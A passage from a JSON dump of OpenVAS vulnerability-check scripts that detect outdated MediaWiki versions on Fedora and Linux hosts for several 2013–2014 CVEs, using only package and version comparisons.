See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868400\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:20 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12262\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12262\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140819.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:12", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-30T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17264", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868638", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17264\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:56:21 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17264\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17264\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2015-5569", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869260", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2015-5569\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869260\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-19 06:55:37 +0200 (Sun, 19 Apr 2015)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mediawiki FEDORA-2015-5569\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-5569\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154734.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:22", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867678", "href": "http://plugins.openvas.org/nasl.php?oid=867678", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867678);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. 
Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.8/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4511\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:57", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4478", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", 
"id": "OPENVAS:867675", "href": "http://plugins.openvas.org/nasl.php?oid=867675", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4478\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867675);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:14:56 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4478\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. 
Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4478\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131292.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-04T18:50:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "bulletinFamily": "scanner", "cvss2": {}, 
"cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867678", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867678\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n 
script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4511\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4478", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867675", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867675", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4478\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867675\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:14:56 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4478\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4478\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131292.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:26:48", "description": "This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-11-26T00:00:00", "type": "openvas", "title": "MediaWiki Multiple Vulnerabilities -02 Nov15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310806633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MediaWiki Multiple Vulnerabilities -02 Nov15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 
2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mediawiki:mediawiki\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806633\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\");\n script_bugtraq_id(65003);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-26 16:46:38 +0530 (Thu, 26 Nov 2015)\");\n script_name(\"MediaWiki Multiple Vulnerabilities -02 Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error which displays some information about deleted pages in the log\n API, enhanced RecentChanges, and user watchlists.\n\n - An error in CSS whose sanitization did not filter -o-link attributes.\n\n - An error leading SVG sanitization to bypass when the XML was considered\n invalid.\n\n - An error in SVG files upload that could lead to include external stylesheets\n in upload.\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct XSS attacks, gain access to sensitive information and\n have other some unspecified impact.\");\n\n script_tag(name:\"affected\", value:\"MediaWiki before 1.19.10, 1.2x before 1.21.4,\n and 1.22.x before 1.22.1 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.19.10 or 1.21.4 or\n 1.22.1 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"os_detection.nasl\", \"secpod_mediawiki_detect.nasl\");\n script_mandatory_keys(\"mediawiki/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!http_ver = get_app_version(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nif(version_is_less(version:http_ver, test_version:\"1.19.10\"))\n{\n fix = \"1.19.10\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:http_ver, test_version:\"1.20\", test_version2:\"1.21.3\"))\n{\n fix = \"1.21.4\";\n VULN = TRUE ;\n}\n\nelse if(version_is_equal(version:http_ver, test_version:\"1.22.0\"))\n{\n fix = \"1.22.1\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + http_ver + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(port:http_port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:27:24", "description": "This host is installed with MediaWiki\n and is prone to multiple 
